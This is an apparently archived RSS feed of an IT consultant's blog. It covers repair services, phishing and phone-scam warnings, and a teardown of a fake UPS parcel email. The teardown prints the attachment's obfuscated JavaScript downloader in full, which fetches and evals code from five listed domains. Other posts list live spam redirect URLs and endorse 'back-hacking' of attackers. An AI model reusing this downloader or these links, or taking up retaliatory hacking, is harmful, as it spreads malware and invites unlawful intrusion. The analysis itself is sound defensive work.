happycattech.com - Satisfied customers are the Cat's Meow! http://happycattech.com/index.php/rss.xml en Client Services Available http://happycattech.com/index.php/client-services-available <span class="field field--name-title field--type-string field--label-hidden">Client Services Available</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="http://happycattech.com/" target="_self">Happy Cat Technologies</a> provides the following services to clients in the <u>Fort Collins/Loveland and local areas only</u>:</p> <ul><li>Computer maintenance, such as dust-out/cleaning, removing unwanted pre-installed applications, installing/upgrading applications, removing malware and viruses, creation of emergency boot disks, optimizing (<em>speed up</em>), diagnostic troubleshooting, etc. We support Windows (<em>7-10</em>), OS-X, and Linux operating systems. Service on smart phones or tablets based on the Android OS is also available depending on model. Service on Apple smart phones and tablets is not available due to Apple product policies.</li> <li>Tower and laptop hardware servicing including hardware installation, upgrading, troubleshooting, and defective component replacement. Limited Apple laptop hardware support is provided due to Apple product policies.</li> <li style="margin-bottom: 0in">Data Recovery and Backup, to mitigate disaster situations, such as when the operating system won't start. We also provide password recovery for some versions of Windows. We can recommend and setup backups to local media (DVD), removable media (flash drive, external hard drive), or to Cloud (<a href="https://www.sosonlinebackup.com/" target="_blank">SOS Backup</a>, <a href="https://www.carbonite.com/" target="_blank">Carbonite</a>, etc).</li> <li style="margin-bottom: 0in">Network/WIFI consultation, design, installation, configuring and troubleshooting, including cable routing. We also do security evaluations of WIFI installations.</li> <li>Web site<sup>[<a href="http://happycattech.com/client-services-available/#websites">1</a>]</sup> provisioning from initial consultation to development, <!--break-->deployment, and administration including <a href="https://www.drupal.org/" target="_blank">Drupal</a> / <a href="https://wordpress.org/" target="_blank">WordPress</a> Content Management Systems (CMS).</li> <li>Search Engine Optimization (SEO).</li> <li>Server installation, configuration, and troubleshooting for email and web site servers such as <a href="http://httpd.apache.org/" target="_blank">Apache</a>. We also perform <a href="http://www.mysql.com/" target="_blank">mySQL</a> and Microsoft Access database configuration, deployment, administration, and development including custom query/report creation, query/report debug, and verification.</li> <li>Application design in PHP, Java, JavaScript, C++, and other programming languages. We have the capability to create new applications for you or to modify/debug old applications if the original source code is available.</li> <li>IT security consultation, penetration testing, and digital forensics.</li> <li>Electronics Engineering capability, including design, simulation, PCB generation, verification, and characterization.</li> <li>Training in applications, operation / administration on Windows (<em>7-10</em>), OS-X, Linux, iOS and Android. This includes Word Processing, Spreadsheets, Email, Graphics, and more.</li> <li>Customer support and advice is always free! We want you to be a happy, satisfied customer. There is a <u><em><strong><span class="green">50% discount</span></strong></em></u> on first service calls for all new clients.</li> </ul><p><strong>Please call for a <span class="green">free estimate</span>: 970.297.8490</strong></p> <p><em>Our rates are fair and competitive, with a one year warranty on all service preformed excepting hardware</em><sup>[<a href="http://happycattech.com/client-services-available/#hwdwarantee">2</a>]</sup>.<br /><small><strong>Service rate is $45.00/hour other than training.</strong></small><br /><small><strong>Residential and Training rate is $30.00/hour, more than one individual welcome for training.</strong></small></p> <p><a name="websites" id="websites"></a><sup>[1]</sup>Happy Cat Technologies only provides website development on Linux/Unix hosted sites. Due to the nature of website development and the time involved, websites are contracted on a per site basis. Websites are from $300 for a flat website, to around $2500-$3500 for fully functional e-Commerce WordPress or Drupal sites. Business logo development, research and/or extensive graphic generation are billed at the service rate of $45.00/hour. Website updates, not including Javascript or PHP programming are at the rate of $20/hour. Please call for details.</p> <p>Hosting/Domain Name Registration support may be provided for clients at the hosting provider/registrar of their choice or at Happy Cat Technology's preferred hosting provider/registrar, <a href="https://www.godaddy.com/" target="_blank">GoDaddy</a>.</p> <p><a name="hwdwarantee" id="hwdwarantee"></a><sup>[2]</sup>New hardware <u>installation</u> is warrantied for a period of one year. Installed hardware is warrantied under the terms of the warranty provided by the vendor/manufacturer of the hardware. Hardware repaired by Happy Cat Technologies is warrantied for a period of ninety (90) days.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Thu, 12/01/2016 - 13:09</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/75" hreflang="en">Client</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/76" hreflang="en">Services</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=49&amp;2=field_comments&amp;3=comment_forum" token="Rc0geyMZ-z_KBJxSSgkIeQ5Izdp7Pd3ACvsQLmrMUCo"></drupal-render-placeholder> </section> Thu, 01 Dec 2016 20:09:57 +0000 AlReaud 49 at http://happycattech.com http://happycattech.com/index.php/client-services-available#comments Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof http://happycattech.com/index.php/hacker-mitigation/ups-pacel-shipping-problem-spoof <span class="field field--name-title field--type-string field--label-hidden">Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>At least once a week I get attachments from a “reputable” organization saying my account (<span class="poop">that I don't have</span>) has been locked due to suspicious activity being detected, a bank account (<span class="poop">that I don't have</span>) needs verification, or there is a problem with the shipment of a parcel (<span class="poop">I didn't order</span>). This week I got an interesting one from "<em>Jordan Mccabe, UPS Station Manager</em>". Sadly the sending individual doesn't know enough about the target to realize that "UPS" and "Post Office", well, kind of mismatch. But this one got me interested in doing some reverse engineering of the suspicious attachment because of it's small size, only 817 bytes.</p> <p>The text of the email is as follows:<br /><strong>Date:</strong> 02/26/2017 01:35 AM<br /><strong>From:</strong> virtual-user &lt;<a href="mailto:webmaster@lippocastano.it">webmaster@lippocastano.it</a>&gt;<br /><strong>Subject:</strong> Parcel #001210497 shipment problem, please review<br /><strong>To:</strong> Me<br /><strong>Body:</strong></p> <blockquote> <pre wrap=""> Dear Customer, Your item has arrived at the UPS Post Office at February 25, but the courier was unable to deliver parcel to you. Postal label is enclosed to this e-mail. Please check the attachment! Yours sincerely, Jordan Mccabe, UPS Station Manager. </pre> </blockquote> <p><strong>Attachment:</strong> UPS-Parcel-ID-001210497.zip<br /><strong>Attachment Checksum (MD5):</strong> 3e01923b9fd179c864bf40caffb21786</p> <img alt="Screen capture of UPS Trojan Attachment Email showing highlights." data-entity-type="file" data-entity-uuid="c99346fc-3b19-4db0-a151-4a6d999ca8ab" src="/sites/hctc/files/inline-images/UPS%20Trojan%20Attachment%20Email.png" class="align-center" /><p>The highlighted areas indicate areas that commonly give away the fact that it is a spoof. Usually the sender address is strange or wrong, the grammar is wrong, and the context of the message is wrong.</p> <p>Unzipping the attachments creates a second zip file with a<!--break--> <em>.doc.zip</em> extension (<em>Microsoft Word Document.Compressed File</em>) that is 694 bytes long. Most Windows installations will show this as <em>.doc</em> file rather than as it's true extension which is a <em>.zip</em> file.<br /><strong>Unzipped Attachment:</strong> UPS-Parcel-ID-001210497.doc.zip<br /><strong>Unzipped Attachment Checksum (MD5):</strong> 6a6d2e478e7a2b0259f1fcc333e7cde3</p> <p>My interpretation is that if one were to double click on that file in a File Explorer window, Windows would actually extract the compressed file and try to execute it with the proper software. But we are doing this on Ubuntu 16.04, so we have to do it manually and make some assumptions that may not be valid. We'll get to that later…</p> <p>Unzipping the compressed document file gives a third file with a .doc.js extension (Microsoft Word Document.JavaScript Source) that is, again, 817 bytes long. I believe that this JavaScript file would then be executed by the default browser on the system, which would normally be Microsoft Internet Explorer or, now, Microsoft Edge.<br /><strong>Unzipped Document File:</strong> UPS-Parcel-ID-001210497.doc.js<br /><strong>Unzipped Document File Checksum (MD5):</strong> f1bce6d06683909f54cefd27490c097d</p> <p>The content of this JavaScript installer is as follows. It is simply encoded in an attempt to defeat malware scanners. For simplicity I've removed blank lines:</p> <ol><li> <pre> var sder = "P";</pre> </li> <li> <pre> var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;</pre> </li> <li> <pre> var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";</pre> </li> <li> <pre> var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");</pre> </li> <li> <pre> var t4 = "ht"+"tp";</pre> </li> <li> <pre> var mul = "qwadro";</pre> </li> <li> <pre> var ter = "/";</pre> </li> <li> <pre> for (var i=0; i&lt;x.length; i++)</pre> </li> <li> <pre> { </pre> </li> <li> <pre> var vDJmB = function(){</pre> </li> <li> <pre> return new ActiveXObject(g2);</pre> </li> <li> <pre> }();</pre> </li> <li> <pre> var e = vDJmB;</pre> </li> <li> <pre> try</pre> </li> <li> <pre> { </pre> </li> <li> <pre> var guama=["\x6F\x70\x65\x6E"];e[guama[0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m,false) </pre> </li> <li> <pre> e.send();</pre> </li> <li> <pre> var r = e.responseText;</pre> </li> <li> <pre> if (r.length &gt; 999+1 &amp;&amp; r.indexOf(m) &gt; -1)</pre> </li> <li> <pre> {</pre> </li> <li> <pre> eval(e.responseText.split(m).join(mul.substring(2,3)));</pre> </li> <li> <pre> break;</pre> </li> <li> <pre> };</pre> </li> <li> <pre> }</pre> </li> <li> <pre> catch(e)</pre> </li> <li> <pre> {</pre> </li> <li> <pre> };</pre> </li> <li> <pre> };</pre> </li> </ol><p> </p> <p>The JavaScript goes out to five websites and downloads encoded preliminary payloads that are using something similar to <a href="https://en.wikipedia.org/wiki/Steganography" target="_blank">steganography</a> for obfuscation purposes. After configuring variables, the script creates an <a href="https://en.wikipedia.org/wiki/ActiveX" target="_blank">ActiveX</a> object, <strong>vDJmB</strong> (<em>line 10</em>), assigns it to a variable, <strong>e</strong> (<em>line 13</em>), then tries to open the <a href="https://en.wikipedia.org/wiki/ActiveX" target="_blank">ActiveX</a> object with the parameters shown in (<em>line 16</em>). The five sites listed for this version are in array variable <strong>x</strong> (<em>line 4</em>), and the key is in variable <strong>m</strong> (<em>line 3</em>). If successful, the script assigns the response to a variable, <strong>r</strong> (<em>line 18</em>), checks it's size, and then evaluates the decoded primary payload (<em>line 21</em>), which is also JavaScript.</p> <p><span class="warning">TO BE CONTINUED…</span></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 02/28/2017 - 19:26</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/56" hreflang="en">Email Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/90" hreflang="en">Trojan Installers</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=58&amp;2=field_comments&amp;3=comment_forum" token="L2LFPKKip5GNkBZT17qpo1o8WIwnf064-fVTgTT9I1U"></drupal-render-placeholder> </section> Wed, 01 Mar 2017 02:26:26 +0000 AlReaud 58 at http://happycattech.com http://happycattech.com/index.php/hacker-mitigation/ups-pacel-shipping-problem-spoof#comments Beware the www.support.me phone scam... http://happycattech.com/index.php/hacker-mitigation/beware-www-support-me-phone-scam <span class="field field--name-title field--type-string field--label-hidden">Beware the www.support.me phone scam...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I got a call from <strong>(212) 877-1620</strong>, which is a Verizon New York number on Friday, February 24 2017. This number had been trying to reach me almost daily since February 14. Must have been an important call if they are doing that, so I answered. The guy on the other line was from a "<span class="poop">Microsoft Certified support provider</span>" (<em><span class="saddle">Right</span> </em><img alt="frown" height="23" src="/libraries/smiley/images/confused_smile.png" title="frown" width="23" />) who wanted to let me know that <span class="poop">they had detected my Windows computer putting out malware</span>. <span class="royal">Really? Which computer?</span> I have four computers up and running. <span class="poop">Oh, the one you are on now.</span> <span class="royal">That's pretty interesting,</span> I told him, <span class="royal">the computer was powered down.</span> <span class="poop">Oh, we have logs of it</span> he said. He had one of those Mumbai British accents that lets the cat jump right out of the bag, if you know what I mean…</p> <p>The truth of the matter is that I have ZERO computers that have Windows on them, I only run versions of Linux. <img alt="wink" height="23" src="/libraries/smiley/images/wink_smile.png" title="wink" width="23" /> So I started feeding him line and slowly reeling him in. I was able to troll him for about 17 minutes (<em>You want to keep them on the line as long as possible, as it cuts down their effectiveness</em>). We get started right away, as <span class="poop">he tells me it's a critical problem, and it has to be fixed right away.</span> Sure, right! <span class="poop">Lets try to open the command prompt running Windows-Key+R</span>. <span class="royal">Doesn't work. No command prompt shows up.</span> <span class="royal">Should I be doing a capital "R"</span>, <span class="poop">no just Windows-Key+R</span>. So we go through a few permutations of the opening of the command prompt in Windows. Doesn't work.</p> <p><span class="poop">OK, could you open Internet Explorer</span>. <span class="royal">How?</span> Spend a few minutes on that. <span class="royal">No can't do that either.</span> <span class="poop">How about some other browser?</span> <span class="royal">Sure I have Firefox. Ok, that works</span> (<em>because I'm looking for a website address, LOL</em>). OK, so he sends me to <a href="http://www.support.me" target="_blank">http://www.support.me</a>, which immediately redirects me<!--break--> to <a href="https://secure.logmeinrescue.com/Customer/Code.aspx" target="_blank">https://secure.logmeinrescue.com/Customer/Code.aspx</a>. Then he gives me a code, something like "888BCA6000C04FD7062". He was very specific about the 888, though, and I messed around with the numbers to verify that the first three digits were the important ones. Well the support code doesn't download anything, because I have a locked down browser that wouldn't run scripts and neither will the system run anything .exe because the system isn't Windows. We're at about 15 minutes into the gig now, and he's getting frustrated. He gets his supervisor on the phone, with an authoritative no-nonsense Mumbai British accent. And he's getting pissed almost immediately. After a couple more minutes, he asks me: <span class="poop">What do you use your computer for?</span> <span class="royal">I use it for back-hacking.</span> <span class="poop">Back-hacking?</span> <span class="royal">Yes, I run an IT business and I hack in reverse, i.e. I go after scammers and spammers and try to penetrate and disable their systems...</span> <span class="poop">Oh, you're an IT guy like us, so why did I waste their time...</span> Hangup. Because <em><u><strong>I'M NOT AN IT GUY LIKE THEM</strong></u></em>!</p> <p>The gist of this is <span class="emergency">never, ever</span> allow somebody remote access to your computer off of a cold call. The legitimate outfits will not be calling up to offer you malware removal. Especially not Microsoft. <a href="https://secure.logmein.com/home" target="_blank">LogMeIn</a> is a <u>legitimate outfit</u>, but there are individuals abusing the system, just like they do with everything else. <a href="https://secure.logmein.com/home" target="_blank">LogMeIn</a> gives a page: <a href="http://help.logmein.com/articles/en_US/FAQ/Avoiding-scammers-who-abuse-LogMeIn-Rescue-trial-accounts" target="_blank">Avoiding scammers who abuse LogMeIn Rescue trial accounts</a> as a guide to how to address the issue. Be safe, and pay attention to how the interaction begins, what is being asked, and why you need to cooperate with the caller. <u>A request to call back is</u> <span class="emergency">very important</span> on your part, because usually the number that they called from is not real. They are doing a <a href="https://en.wikipedia.org/wiki/Voice_over_IP" target="_blank">VOIP</a> call from a sweatshop overseas, and spoofing the calling number. When I called back the number was not in service!</p> <p>Safe and secure computing folks!</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sun, 02/26/2017 - 19:48</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/88" hreflang="en">Phone Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/89" hreflang="en">Support.Me</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=57&amp;2=field_comments&amp;3=comment_forum" token="j17t04LHIXrIuZhARmJheUcFkn1-vOWk9-PhzTh6Hzw"></drupal-render-placeholder> </section> Mon, 27 Feb 2017 02:48:32 +0000 AlReaud 57 at http://happycattech.com http://happycattech.com/index.php/hacker-mitigation/beware-www-support-me-phone-scam#comments Back-Hacker Blog http://happycattech.com/index.php/backhacker-blog <span class="field field--name-title field--type-string field--label-hidden">Back-Hacker Blog</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>The <a href="http://www.forbes.com/sites/patricklin/2016/09/26/forget-about-law-and-ethics-is-hacking-back-even-effective/" target="_blank">Back-Hacking</a> Blog came into existence around December 2011 after I started using <a href="https://www.kali.org/" target="_blank">Kali Linux</a>. It comes from the idea of defending against hackers in a manner similar to <a href="http://www.kravmagaloveland.com/" target="_blank">Krav Maga</a>. The putative system or security administrator doesn't just sit there passively receiving attacks, rather in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first <a href="http://www.bankinfosecurity.com/interviews/legal-merits-hack-back-strategy-i-1729" target="_blank">Back-Hacking</a> link (<em>and this one</em>). There are legal, ethical and logistical questions to be addressed. Sometimes it is quite effective, as related in <a href="http://happycattech.com/hacker-mitigation/suntrust-spoof" target="_blank">SunTrust Spoof: Additional ways of protecting your SunTrust access</a> it can be quite effective. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My <em>personal</em> position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.<!--break--></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sun, 11/13/2016 - 14:17</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/63" hreflang="en">Defense</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=40&amp;2=field_comments&amp;3=comment_forum" token="688ilt82HZpfBy2XnClGhjtUqwAWSMV09KuswibtkrE"></drupal-render-placeholder> </section> Sun, 13 Nov 2016 21:17:49 +0000 AlReaud 40 at http://happycattech.com http://happycattech.com/index.php/backhacker-blog#comments Hitting the nail on the head... http://happycattech.com/index.php/hitting-the-nail-on-the-head <span class="field field--name-title field--type-string field--label-hidden">Hitting the nail on the head...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Since publishing the article “<a href="http://happycattech.com/beware-scam-email-top-stream-download" target="_blank">Beware those scam emails from .top, .stream and .download domains</a>” I must have pissed somebody off by giving some good advice. Since then I've been literally inundated with spam emails from the domains .top, .stream, .download and .win. When I cleared the junk filters out, I had almost 800 junk emails for the week of Sunday October 23 - Saturday, October 29, 2016. This week the count is at 132 so far (<span class="poop"><em>see image below</em></span>)! That previous weekly total is more than I usually get in a month. Further I've had some idiot with the email address something like <span class="poop">dhawalnator[at]gmail.com</span> emailing Toyota and Hundai dealerships in San Jose, Fresno, and other cities in California giving my phone number and saying that I'm interested in a vehicle. Actually it's kind of funny, because I answer the calls and tell them that they are sadly the victim of a retaliatory email scam. That went on all last week. I need one of those dealerships to forward that email to <a href="mailto:alreaud@happycattech.com">alreaud[at]happycattech.com</a> so I can analyze it.</p> <p>This leads me to believe that I gave out good advice that is effective in preventing email phishers/scammers from being successful. So I'll give y'all another piece of advice, gratis. Use the <a href="https://www.mozilla.org/en-US/thunderbird/" target="_blank">Thunderbird email browser</a>. It has one of the best<!--break--> trainable spam filters, and can implement custom filters, that allow you to catch all the .top, .stream, .download and .win domain spam emails, mark them as junk, and delete them before they get to your inbox. It's working like a champ for me, and each day I get more junk to train the spam filter to be a genius at trapping spam.</p> <p>Continue on folks, whoever you are. Like the <a href="http://www.digitalattackmap.com/understanding-ddos/" target="_blank">DDoS attack</a> on <a href="http://krebsonsecurity.com/" target="_blank">Kerbs on Security</a>, when you get the attention of the <a href="https://en.wikipedia.org/wiki/Black_hat" target="_blank">black-hats</a> you know that you are on the right track! <img alt="cheeky" height="23" src="/libraries/smiley/images/tongue_smile.png" title="cheeky" width="23" /></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Mon, 10/31/2016 - 18:33</span> <div class="field field--name-field-image field--type-image field--label-above"> <div class="field__label">Image</div> <div class="field__item"> <img src="/sites/hctc/files/2016-10/Screenshot-spam-email_20161031-193616.png" width="622" height="480" alt="Spam email sample for 10-31-2016" typeof="foaf:Image" /> </div> </div> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/25" hreflang="en">Email Spam</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/50" hreflang="en">Retaliation</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=33&amp;2=field_comments&amp;3=comment_forum" token="EEMyAgqvuW3t8rG-1DMfF7_-xiE4Dwkxv-MAiYTusa8"></drupal-render-placeholder> </section> Tue, 01 Nov 2016 00:33:06 +0000 AlReaud 33 at http://happycattech.com http://happycattech.com/index.php/hitting-the-nail-on-the-head#comments Beware those scam emails from .top, .stream and .download domains http://happycattech.com/index.php/beware-scam-email-top-stream-download <span class="field field--name-title field--type-string field--label-hidden">Beware those scam emails from .top, .stream and .download domains</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Since the advent of .top, .stream, and .download domains there has been a plethora of new spam emails that are flooding the Internet. This result comes from cheap hosting accounts available from many providers. Hosting providers have no incentive, however, to stop this because they are making money from hosting questionable accounts, and there are <a href="https://askleo.com/stopping-spam-harder-think/" target="_blank">technical and legal challenges</a> to stopping spam.</p> <p>Spotting the scam emails is pretty easy, they usually come from strange addresses ending in <strong>.top, .stream, or .download</strong>, but can be from other domains with entreaties to protect children, etc. Usually, but not always, the emails <u>contain only images</u>, and the links are very ephemeral. The most important thing you can do to protect yourself from these is to <a href="https://www.google.com/search?client=ubuntu&amp;channel=fs&amp;q=disabling+remote+content+on+email+browsers" target="_blank">DISABLE REMOTE CONTENT (<em>Google your specific email browser to get the information on how to do so</em>)</a>. The next most important thing, other than marking them as spam and deleting them immediately, is to set filters that mark and delete email from .top, .stream, and .download domains.</p> <p>By disabling remote content, the image that is usually enclosed in the spam email isn't downloaded. That prevents the compromised server these things redirect to from knowing that your email address is valid and being read. It can do so because as seen below, the embedded links in the email have a unique signature that is associated with your email address.</p> <p>Five examples are (<em>redirects are done using the text only browser, <a href="http://lynx.browser.org/" target="_blank">Lynx</a>, and <a href="https://www.wireshark.org/" target="_blank">Wireshark</a> for packet capture, <span class="emergency">PLEASE DON'T FOLLOW ANY OF THE LINKS BELOW UNLESS YOU ABSOLUTELY KNOW WHAT YOU ARE DOING!</span></em>):<!--break--></p> <ul><li><strong>From:</strong> Medical Alert Alarms &lt;<a href="mailto:MedicalAlertAlarms@tennantly.stream">MedicalAlertAlarms@tennantly.stream</a>&gt; <em><strong>10/3/2016 03:10 PM</strong></em><br /><strong>Subject:</strong> Get The Protection Your Family Need <em>(<span class="warning">notice the incorrect grammar</span>)</em><br /><strong>Email Link:</strong> <a href="http://www.tennantly.stream/l/lt9U29235X1227E/1428A7800LH42140XO1109G195871823A1091728285">http://www.tennantly.stream/l/lt9U29235X1227E/1428A7800LH42140XO1109G19…</a><br /><strong>Redirects to:</strong> &lt;hidden link&gt; <a href="http://www.tennantly.stream/tr9/14/29235/7800/42140/1109/195871823/index.htm">http://www.tennantly.stream/tr9/14/29235/7800/42140/1109/195871823/inde…</a><br /><strong>IP:</strong><br /><em>Only works once because the link is ID encoded. After first use then you get Yahoo.com, or Youtube.com, etc., Pretty smart to prevent backhacking…</em></li> <li><strong>From:</strong> Alaska    Cruises &lt;<a href="mailto:AlaskaCruises@vaudevilledj.stream">AlaskaCruises@vaudevilledj.stream</a>&gt; <em><strong>10/3/2016 08:16 AM</strong></em><br /> Subject: Compare Amazing Alaska - Cruises - Deals.. <em>(<span class="warning">notice extra spaces, typos, incorrect grammar</span>)</em><br /><strong>Email Link:</strong> <a href="http://www.vaudevilledj.stream/l/lt468D39418JN1832L/1879NO11928L241797IU905U147850838W3487181010">http://www.vaudevilledj.stream/l/lt468D39418JN1832L/1879NO11928L241797I…</a><br /><strong>Redirects to:</strong> <a href="http://www.vaudevilledj.stream/tr13/9/39418/11928/241797/905/147850838/index.htm">http://www.vaudevilledj.stream/tr13/9/39418/11928/241797/905/147850838/…</a><br /><strong>IP:</strong><br /><em>Another only works once link. Sends you to Lycos, Microsoft.com, etc., after first try.</em></li> <li><strong>From:</strong> Harp-Approval-Partner &lt;<a href="mailto:Harp-Approval-Partner@huugiol4.peadiao.top">Harp-Approval-Partner@huugiol4.peadiao.top</a>&gt; <em><strong>09/25/2016 09:47 AM</strong></em><br /><strong>Subject:</strong> HARP Extended into 2016. Qualify To Save On Your Mortgage<br /><strong>Email Link:</strong> <a href="http://checkitout.peadiao.top/u/10116053">http://checkitout.peadiao.top/u/10116053</a><br /><strong>Redirect to:</strong> <a href="http://www.flowared.com/98cHPNJ8lNFIrRTYF47sK-s3oV7JTJEb3dX4L6tRXvY2gJ30tFpuaNpjvprK6fLsJIGdHs3ZxWZkEYVZgrsC8g~~/need0925-j15t">http://www.flowared.com/98cHPNJ8lNFIrRTYF47sK-s3oV7JTJEb3dX4L6tRXvY2gJ3…</a><br /><strong>IP Address:</strong> <strong>Result:</strong> Page not found, already taken down.<br /><em>As can be seen, from the link sent, you are uniquely identified…</em></li> <li><strong>From:</strong> Private Jet Rentals Specials &lt;<a href="mailto:Private.Jet.Rentals.Specials@efieu6a.ouchail.top">Private.Jet.Rentals.Specials@efieu6a.ouchail.top</a>&gt; <em><strong>09/17/2016 05:59 AM</strong></em><br /><strong>Subject:</strong> Private Jet Rentals are more affordable than you thought<br /><strong>Email Link:</strong> <a href="http://checkitout.ouchail.top/clickhere     &amp;nbsp">http://checkitout.ouchail.top/clickhere     &amp;nbsp</a>; <strong>IP:</strong><br /><strong>Redirects to:</strong>  <a href="http://privatejetrental.space/?acqsrc=MTk3MjgyMTM5ODYzODE4OO0kxjof%2FyawwLYKdHoY8J7EZfV%2BaUwERGJcyquphCoc">http://privatejetrental.space/?acqsrc=MTk3MjgyMTM5ODYzODE4OO0kxjof%2Fya…</a><br /><strong>IP:</strong> in Germany. <strong>Result:</strong> Error 400 Bad Request.<br /><em>Again, uniquely identifies you…</em></li> <li><strong>From: </strong>Making Children Safe &lt;<a href="mailto:making.children.safe@atechpk.com">making.children.safe@atechpk.com</a>&gt; <em><strong>10/3/2016 03:00 PM</strong></em><br /><strong>Subject:</strong> Put this watch on your child's wrist and GPS track them with 2/way calling and alert if remove attempted.<br /><strong>Email Link:</strong> <a href="http://www.atechpk.com/&amp;nbsp">http://www.atechpk.com/&amp;nbsp</a>; <a href="http://kids.atechpk.com/">http://kids.atechpk.com/</a> IP:<br /><strong>Redirects to:</strong> <a href="http://decallium.com/0/0/0/b93d790c442809f00d8530ca129ff4a4/uh66">http://decallium.com/0/0/0/b93d790c442809f00d8530ca129ff4a4/uh66</a><br /><strong>IP:</strong><br /><strong>Further Redirect (as a javascript):</strong> &lt;script type="text/javascript"&gt;window.location.href="<a href="http://fwd.trustedredirect.net/ts481-international-general.com">http://fwd.trustedredirect.net/ts481-international-general.com</a>"&lt;/script&gt;<br /><em>But Lynx won't follow those so we end here!</em></li> </ul><p>I'm waiting for my count of suspicious spam email to reach 100, then we're going to do some mapping to see who owns these sites and domains, who the hosting providers are, what the IP address and countries are, etc. There is a need to find out the commonalities between them to be able to effectively fight this scourge of the Internet. Safe emailing, folks!</p> <p> </p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Mon, 10/03/2016 - 17:43</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/25" hreflang="en">Email Spam</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/26" hreflang="en">Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/27" hreflang="en">Spoofs</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=19&amp;2=field_comments&amp;3=comment_forum" token="2kNIYimpLfAjZg_EtqWFrLX_CWpZo-3z-xXpDp9JydQ"></drupal-render-placeholder> </section> Mon, 03 Oct 2016 23:43:54 +0000 AlReaud 19 at http://happycattech.com http://happycattech.com/index.php/beware-scam-email-top-stream-download#comments Geek Thought of the Day Archive http://happycattech.com/index.php/book/geek-thought-day-archive <span class="field field--name-title field--type-string field--label-hidden">Geek Thought of the Day Archive</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>After seeing so many excellent thoughts of the day disappear into the aether, we thought that maybe it's a good idea to archive them. These all come from the Linux application <a href="https://en.wikipedia.org/wiki/Fortune_(Unix)">fortune-mod</a>, selected for (<em>mostly</em>)geek fortunes. As we enter a new fortune, we'll put the ones being replaced here as entries. These will be placed in year, month and day order as the amount of archived entries increases. We don't always follow this rule, so please bear with us…</p> </div> <span><span lang="" 